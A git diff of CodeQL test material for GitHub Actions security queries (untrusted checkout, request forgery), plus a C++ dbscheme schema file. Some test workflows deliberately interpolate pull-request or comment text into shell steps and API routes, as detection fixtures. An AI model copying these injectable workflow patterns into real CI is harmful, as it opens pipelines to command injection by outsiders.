.github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref index 667c7a786389..9f17733e16e8 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-829/UntrustedCheckoutCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-829/UntrustedCheckoutCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref index 84af7bdc7237..66b3f2cd9bf2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref @@ -1,2 +1 @@ -query: Security/CWE-829/UntrustedCheckoutHigh.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-829/UntrustedCheckoutHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref index 1cb2407ccc7a..55bb194f5ecd 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref @@ -1,2 +1 @@ -query: Security/CWE-829/UntrustedCheckoutMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-829/UntrustedCheckoutMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref index e3d739264b2c..1887390c0f3d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-829/UnversionedImmutableAction.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-829/UnversionedImmutableAction.ql diff --git a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml index 849f1cdf8ec4..6937467453b2 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml @@ -6,5 +6,5 @@ jobs: steps: - uses: octokit/request-action@v2 with: - route: ${{ github.event.comment.body }} # $ Alert + route: ${{ github.event.comment.body }} diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected index 5387cf2ebabb..d980139bb357 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected @@ -1,6 +1,6 @@ -#select -| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | edges nodes | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths +#select +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref index 46eea075c3c3..5479b022be0f 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-918/RequestForgery.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-918/RequestForgery.ql diff --git a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml index 60f4b010f6d1..a8bfa4ae19a2 100644 --- a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml +++ b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml @@ -4,4 +4,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo ${{ github.event.pull_request.body}} # $ Alert + - run: echo ${{ github.event.pull_request.body}} diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref index f2bd2df19cbb..97c5686103cf 100644 --- a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref +++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref @@ -1,2 +1 @@ -query: Debug/SyntaxError.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Debug/SyntaxError.ql diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml index 301de120d6f9..31f43d8b8b29 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml @@ -52,7 +52,7 @@ jobs: # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). # If this step fails, then you should remove it and run the build manually (see below) - - name: Autobuild # $ Alert + - name: Autobuild uses: github/codeql-action/autobuild@v3 # â„¹ï¸ Command-line programs to run using the OS shell. diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref index 1cdc74dec251..75a8fe2398a6 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref @@ -1,2 +1 @@ -query: Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql \ No newline at end of file diff --git a/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/old.dbscheme b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/old.dbscheme new file mode 100644 index 000000000000..0853f43dc8c0 --- /dev/null +++ b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/old.dbscheme @@ -0,0 +1,2578 @@ + +/*- Compilations -*/ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * gcc -c f1.c f2.c f3.c + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + /** + * An invocation of the compiler. Note that more than one file may + * be compiled per invocation. For example, this command compiles + * three source files: + * + * gcc -c f1.c f2.c f3.c + */ + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | *path to extractor* + * 1 | `--mimic` + * 2 | `/usr/bin/gcc` + * 3 | `-c` + * 4 | f1.c + * 5 | f2.c + * 6 | f3.c + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The expanded arguments that were passed to the extractor for a + * compiler invocation. This is similar to `compilation_args`, but + * for a `@someFile` argument, it includes the arguments from that + * file, rather than just taking the argument literally. + */ +#keyset[id, num] +compilation_expanded_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * Optionally, record the build mode for each compilation. + */ +compilation_build_mode( + unique int id : @compilation ref, + int mode : int ref +); + +/* +case @compilation_build_mode.mode of + 0 = @build_mode_none +| 1 = @build_mode_manual +| 2 = @build_mode_auto +; +*/ + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.c + * 1 | f2.c + * 2 | f3.c + * + * Note that even if those files `#include` headers, those headers + * do not appear as rows. + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- Diagnostic messages -*/ + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +/*- C++ dbscheme -*/ + +extractor_version( + string codeql_version: string ref, + string frontend_version: string ref +) + +/** + * Gives the TRAP filename that `trap` is associated with. + * For debugging only. + */ +trap_filename( + int trap: @trap, + string filename: string ref +); + +/** + * Gives the tag name for `tag`. + * For debugging only. + */ +tag_name( + int tag: @tag, + string name: string ref +); + +@trap_or_tag = @tag | @trap; + +/** + * Gives the name for the source file. + */ +source_file_name( + int sf: @source_file, + string name: string ref +); + +/** + * In `build-mode: none` overlay mode, indicates that `source_file` + * (`/path/to/foo.c`) uses the TRAP file `trap_file`; i.e. it is the + * TRAP file corresponding to `foo.c`, something it transitively + * includes, or a template instantiation it transitively uses. + */ +source_file_uses_trap( + int source_file: @source_file ref, + int trap_file: @trap ref +); + +/** + * In `build-mode: none` overlay mode, indicates that the TRAP file + * `trap_file` uses tag `tag`. + */ +trap_uses_tag( + int trap_file: @trap ref, + int tag: @tag ref +); + +/** + * Holds if there is a definition of `element` in TRAP file or tag `t`. + */ +in_trap_or_tag( + int element: @element ref, + int t: @trap_or_tag ref +); + +pch_uses( + int pch: @pch ref, + int compilation: @compilation ref, + int id: @file ref +) + +#keyset[pch, compilation] +pch_creations( + int pch: @pch, + int compilation: @compilation ref, + int from: @file ref +) + +/** An element for which line-count information is available. */ +@sourceline = @file | @function | @variable | @enumconstant | @xmllocatable; + +fileannotations( + int id: @file ref, + int kind: int ref, + string name: string ref, + string value: string ref +); + +inmacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +affectedbymacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +case @macroinvocation.kind of + 1 = @macro_expansion +| 2 = @other_macro_reference +; + +macroinvocations( + unique int id: @macroinvocation, + int macro_id: @ppd_define ref, + int location: @location_default ref, + int kind: int ref +); + +macroparent( + unique int id: @macroinvocation ref, + int parent_id: @macroinvocation ref +); + +// a macroinvocation may be part of another location +// the way to find a constant expression that uses a macro +// is thus to find a constant expression that has a location +// to which a macro invocation is bound +macrolocationbind( + int id: @macroinvocation ref, + int location: @location_default ref +); + +#keyset[invocation, argument_index] +macro_argument_unexpanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +#keyset[invocation, argument_index] +macro_argument_expanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +case @function.kind of + 0 = @unknown_function +| 1 = @normal_function +| 2 = @constructor +| 3 = @destructor +| 4 = @conversion_function +| 5 = @operator +// ... 6 = @builtin_function deprecated // GCC built-in functions, e.g. __builtin___memcpy_chk +| 7 = @user_defined_literal +| 8 = @deduction_guide +; + +functions( + unique int id: @function, + string name: string ref, + int kind: int ref +); + +builtin_functions( + int id: @function ref +) + +function_entry_point( + int id: @function ref, + unique int entry_point: @stmt ref +); + +function_return_type( + int id: @function ref, + int return_type: @type ref +); + +/** + * If `function` is a coroutine, then this gives the `std::experimental::resumable_traits` + * instance associated with it, and the variables representing the `handle` and `promise` + * for it. + */ +coroutine( + unique int function: @function ref, + int traits: @type ref +); + +/* +case @coroutine_placeholder_variable.kind of + 1 = @handle +| 2 = @promise +| 3 = @init_await_resume +; +*/ + +coroutine_placeholder_variable( + unique int placeholder_variable: @variable ref, + int kind: int ref, + int function: @function ref +) + +/** The `new` function used for allocating the coroutine state, if any. */ +coroutine_new( + unique int function: @function ref, + int new: @function ref +); + +/** The `delete` function used for deallocating the coroutine state, if any. */ +coroutine_delete( + unique int function: @function ref, + int delete: @function ref +); + +purefunctions(unique int id: @function ref); + +function_deleted(unique int id: @function ref); + +function_defaulted(unique int id: @function ref); + +function_prototyped(unique int id: @function ref) + +deduction_guide_for_class( + int id: @function ref, + int class_template: @usertype ref +) + +member_function_this_type( + unique int id: @function ref, + int this_type: @type ref +); + +#keyset[id, type_id] +fun_decls( + int id: @fun_decl, + int function: @function ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +fun_def(unique int id: @fun_decl ref); +fun_specialized(unique int id: @fun_decl ref); +fun_implicit(unique int id: @fun_decl ref); +fun_decl_specifiers( + int id: @fun_decl ref, + string name: string ref +) +#keyset[fun_decl, index] +fun_decl_throws( + int fun_decl: @fun_decl ref, + int index: int ref, + int type_id: @type ref +); +/* an empty throw specification is different from none */ +fun_decl_empty_throws(unique int fun_decl: @fun_decl ref); +fun_decl_noexcept( + int fun_decl: @fun_decl ref, + int constant: @expr ref +); +fun_decl_empty_noexcept(int fun_decl: @fun_decl ref); +fun_decl_typedef_type( + unique int fun_decl: @fun_decl ref, + int typedeftype_id: @usertype ref +); + +/* +case @fun_requires.kind of + 1 = @template_attached +| 2 = @function_attached +; +*/ + +fun_requires( + int id: @fun_decl ref, + int kind: int ref, + int constraint: @expr ref +); + +param_decl_bind( + unique int id: @var_decl ref, + int index: int ref, + int fun_decl: @fun_decl ref +); + +#keyset[id, type_id] +var_decls( + int id: @var_decl, + int variable: @variable ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +var_def(unique int id: @var_decl ref); +var_specialized(int id: @var_decl ref); +var_decl_specifiers( + int id: @var_decl ref, + string name: string ref +) +is_structured_binding(unique int id: @variable ref); +var_requires( + int id: @var_decl ref, + int constraint: @expr ref +); + +type_decls( + unique int id: @type_decl, + int type_id: @type ref, + int location: @location_default ref +); +type_def(unique int id: @type_decl ref); +type_decl_top( + unique int type_decl: @type_decl ref +); +type_requires( + int id: @type_decl ref, + int constraint: @expr ref +); + +namespace_decls( + unique int id: @namespace_decl, + int namespace_id: @namespace ref, + int location: @location_default ref, + int bodylocation: @location_default ref +); + +case @using.kind of + 1 = @using_declaration +| 2 = @using_directive +| 3 = @using_enum_declaration +; + +usings( + unique int id: @using, + int element_id: @element ref, + int location: @location_default ref, + int kind: int ref +); + +/** The element which contains the `using` declaration. */ +using_container( + int parent: @element ref, + int child: @using ref +); + +static_asserts( + unique int id: @static_assert, + int condition : @expr ref, + string message : string ref, + int location: @location_default ref, + int enclosing : @element ref +); + +// each function has an ordered list of parameters +#keyset[id, type_id] +#keyset[function, index, type_id] +params( + int id: @parameter, + int function: @parameterized_element ref, + int index: int ref, + int type_id: @type ref +); + +overrides( + int new: @function ref, + int old: @function ref +); + +#keyset[id, type_id] +membervariables( + int id: @membervariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +globalvariables( + int id: @globalvariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +localvariables( + int id: @localvariable, + int type_id: @type ref, + string name: string ref +); + +autoderivation( + unique int var: @variable ref, + int derivation_type: @type ref +); + +orphaned_variables( + int var: @localvariable ref, + int function: @function ref +) + +enumconstants( + unique int id: @enumconstant, + int parent: @usertype ref, + int index: int ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); + +@variable = @localscopevariable | @globalvariable | @membervariable; + +@localscopevariable = @localvariable | @parameter; + +/** + * Built-in types are the fundamental types, e.g., integral, floating, and void. + */ +case @builtintype.kind of + 1 = @errortype +| 2 = @unknowntype +| 3 = @void +| 4 = @boolean +| 5 = @char +| 6 = @unsigned_char +| 7 = @signed_char +| 8 = @short +| 9 = @unsigned_short +| 10 = @signed_short +| 11 = @int +| 12 = @unsigned_int +| 13 = @signed_int +| 14 = @long +| 15 = @unsigned_long +| 16 = @signed_long +| 17 = @long_long +| 18 = @unsigned_long_long +| 19 = @signed_long_long +// ... 20 Microsoft-specific __int8 +// ... 21 Microsoft-specific __int16 +// ... 22 Microsoft-specific __int32 +// ... 23 Microsoft-specific __int64 +| 24 = @float +| 25 = @double +| 26 = @long_double +| 27 = @complex_float // C99-specific _Complex float +| 28 = @complex_double // C99-specific _Complex double +| 29 = @complex_long_double // C99-specific _Complex long double +| 30 = @imaginary_float // C99-specific _Imaginary float +| 31 = @imaginary_double // C99-specific _Imaginary double +| 32 = @imaginary_long_double // C99-specific _Imaginary long double +| 33 = @wchar_t // Microsoft-specific +| 34 = @decltype_nullptr // C++11 +| 35 = @int128 // __int128 +| 36 = @unsigned_int128 // unsigned __int128 +| 37 = @signed_int128 // signed __int128 +| 38 = @float128 // __float128 +| 39 = @complex_float128 // _Complex __float128 +// ... 40 _Decimal32 +// ... 41 _Decimal64 +// ... 42 _Decimal128 +| 43 = @char16_t +| 44 = @char32_t +| 45 = @std_float32 // _Float32 +| 46 = @float32x // _Float32x +| 47 = @std_float64 // _Float64 +| 48 = @float64x // _Float64x +| 49 = @std_float128 // _Float128 +// ... 50 _Float128x +| 51 = @char8_t +| 52 = @float16 // _Float16 +| 53 = @complex_float16 // _Complex _Float16 +| 54 = @fp16 // __fp16 +| 55 = @std_bfloat16 // __bf16 +| 56 = @std_float16 // std::float16_t +| 57 = @complex_std_float32 // _Complex _Float32 +| 58 = @complex_float32x // _Complex _Float32x +| 59 = @complex_std_float64 // _Complex _Float64 +| 60 = @complex_float64x // _Complex _Float64x +| 61 = @complex_std_float128 // _Complex _Float128 +| 62 = @mfp8 // __mfp8 +| 63 = @scalable_vector_count // __SVCount_t +| 64 = @complex_fp16 // _Complex __fp16 +| 65 = @complex_std_bfloat16 // _Complex __bf16 +| 66 = @complex_std_float16 // _Complex std::float16_t +; + +builtintypes( + unique int id: @builtintype, + string name: string ref, + int kind: int ref, + int size: int ref, + int sign: int ref, + int alignment: int ref +); + +/** + * Derived types are types that are directly derived from existing types and + * point to, refer to, transform type data to return a new type. + */ +case @derivedtype.kind of + 1 = @pointer +| 2 = @reference +| 3 = @type_with_specifiers +| 4 = @array +| 5 = @gnu_vector +| 6 = @routineptr +| 7 = @routinereference +| 8 = @rvalue_reference // C++11 +// ... 9 type_conforming_to_protocols deprecated +| 10 = @block +| 11 = @scalable_vector // Arm SVE +; + +derivedtypes( + unique int id: @derivedtype, + string name: string ref, + int kind: int ref, + int type_id: @type ref +); + +pointerishsize(unique int id: @derivedtype ref, + int size: int ref, + int alignment: int ref); + +arraysizes( + unique int id: @derivedtype ref, + int num_elements: int ref, + int bytesize: int ref, + int alignment: int ref +); + +tupleelements( + unique int id: @derivedtype ref, + int num_elements: int ref +); + +typedefbase( + unique int id: @usertype ref, + int type_id: @type ref +); + +/** + * An instance of the C++11 `decltype` operator or C23 `typeof`/`typeof_unqual` + * operator taking an expression as its argument. For example: + * ``` + * int a; + * decltype(1+a) b; + * typeof(1+a) c; + * ``` + * Here `expr` is `1+a`. + * + * Sometimes an additional pair of parentheses around the expression + * changes the semantics of the decltype, e.g. + * ``` + * struct A { double x; }; + * const A* a = new A(); + * decltype( a->x ); // type is double + * decltype((a->x)); // type is const double& + * ``` + * (Please consult the C++11 standard for more details). + * `parentheses_would_change_meaning` is `true` iff that is the case. + */ + +/* +case @decltype.kind of +| 0 = @decltype +| 1 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +; +*/ + +#keyset[id, expr] +decltypes( + int id: @decltype, + int expr: @expr ref, + int kind: int ref, + int base_type: @type ref, + boolean parentheses_would_change_meaning: boolean ref +); + +case @type_operator.kind of + 0 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +| 1 = @underlying_type +| 2 = @bases +| 3 = @direct_bases +| 4 = @add_lvalue_reference +| 5 = @add_pointer +| 6 = @add_rvalue_reference +| 7 = @decay +| 8 = @make_signed +| 9 = @make_unsigned +| 10 = @remove_all_extents +| 11 = @remove_const +| 12 = @remove_cv +| 13 = @remove_cvref +| 14 = @remove_extent +| 15 = @remove_pointer +| 16 = @remove_reference_t +| 17 = @remove_restrict +| 18 = @remove_volatile +| 19 = @remove_reference +; + +type_operators( + unique int id: @type_operator, + int arg_type: @type ref, + int kind: int ref, + int base_type: @type ref +) + +case @usertype.kind of + 0 = @unknown_usertype +| 1 = @struct +| 2 = @class +| 3 = @union +| 4 = @enum +// ... 5 = @typedef deprecated // classic C: typedef typedef type name +// ... 6 = @template deprecated +| 7 = @template_parameter +| 8 = @template_template_parameter +| 9 = @proxy_class // a proxy class associated with a template parameter +// ... 10 objc_class deprecated +// ... 11 objc_protocol deprecated +// ... 12 objc_category deprecated +| 13 = @scoped_enum +// ... 14 = @using_alias deprecated // a using name = type style typedef +| 15 = @template_struct +| 16 = @template_class +| 17 = @template_union +| 18 = @alias +; + +usertypes( + unique int id: @usertype, + string name: string ref, + int kind: int ref +); + +usertypesize( + unique int id: @usertype ref, + int size: int ref, + int alignment: int ref +); + +usertype_final(unique int id: @usertype ref); + +usertype_uuid( + unique int id: @usertype ref, + string uuid: string ref +); + +/* +case @usertype.alias_kind of +| 0 = @typedef +| 1 = @alias +*/ + +usertype_alias_kind( + int id: @usertype ref, + int alias_kind: int ref +) + +nontype_template_parameters( + int id: @expr ref +); + +type_template_type_constraint( + int id: @usertype ref, + int constraint: @expr ref +); + +mangled_name( + unique int id: @declaration ref, + int mangled_name : @mangledname, + boolean is_complete: boolean ref +); + +is_pod_class(unique int id: @usertype ref); +is_standard_layout_class(unique int id: @usertype ref); + +is_complete(unique int id: @usertype ref); + +is_class_template(unique int id: @usertype ref); +class_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +class_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +class_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +class_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +) + +@user_or_decltype = @usertype | @decltype; + +is_proxy_class_for( + unique int id: @usertype ref, + int templ_param_id: @user_or_decltype ref +); + +type_mentions( + unique int id: @type_mention, + int type_id: @type ref, + int location: @location_default ref, + // a_symbol_reference_kind from the frontend. + int kind: int ref +); + +is_function_template(unique int id: @function ref); +function_instantiation( + unique int to: @function ref, + int from: @function ref +); +function_template_argument( + int function_id: @function ref, + int index: int ref, + int arg_type: @type ref +); +function_template_argument_value( + int function_id: @function ref, + int index: int ref, + int arg_value: @expr ref +); +function_template_generated_from( + unique int template: @function ref, + int from: @function ref +); + +is_variable_template(unique int id: @variable ref); +variable_instantiation( + unique int to: @variable ref, + int from: @variable ref +); +variable_template_argument( + int variable_id: @variable ref, + int index: int ref, + int arg_type: @type ref +); +variable_template_argument_value( + int variable_id: @variable ref, + int index: int ref, + int arg_value: @expr ref +); +variable_template_generated_from( + unique int template: @variable ref, + int from: @variable ref +); + +is_alias_template(unique int id: @usertype ref); +alias_instantiation( + unique int to: @usertype ref, + int from: @usertype ref +); +alias_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +alias_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +alias_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +); + +template_template_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +template_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +template_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); + +@concept = @concept_template | @concept_id; + +concept_templates( + unique int concept_id: @concept_template, + string name: string ref, + int location: @location_default ref +); +concept_instantiation( + unique int to: @concept_id ref, + int from: @concept_template ref +); +is_type_constraint(int concept_id: @concept_id ref); +concept_template_argument( + int concept_id: @concept ref, + int index: int ref, + int arg_type: @type ref +); +concept_template_argument_value( + int concept_id: @concept ref, + int index: int ref, + int arg_value: @expr ref +); + +routinetypes( + unique int id: @routinetype, + int return_type: @type ref +); + +routinetypeargs( + int routine: @routinetype ref, + int index: int ref, + int type_id: @type ref +); + +ptrtomembers( + unique int id: @ptrtomember, + int type_id: @type ref, + int class_id: @type ref +); + +/* + specifiers for types, functions, and variables + + "public", + "protected", + "private", + + "const", + "volatile", + "static", + + "pure", + "virtual", + "sealed", // Microsoft + "__interface", // Microsoft + "inline", + "explicit", + + "near", // near far extension + "far", // near far extension + "__ptr32", // Microsoft + "__ptr64", // Microsoft + "__sptr", // Microsoft + "__uptr", // Microsoft + "dllimport", // Microsoft + "dllexport", // Microsoft + "thread", // Microsoft + "naked", // Microsoft + "microsoft_inline", // Microsoft + "forceinline", // Microsoft + "selectany", 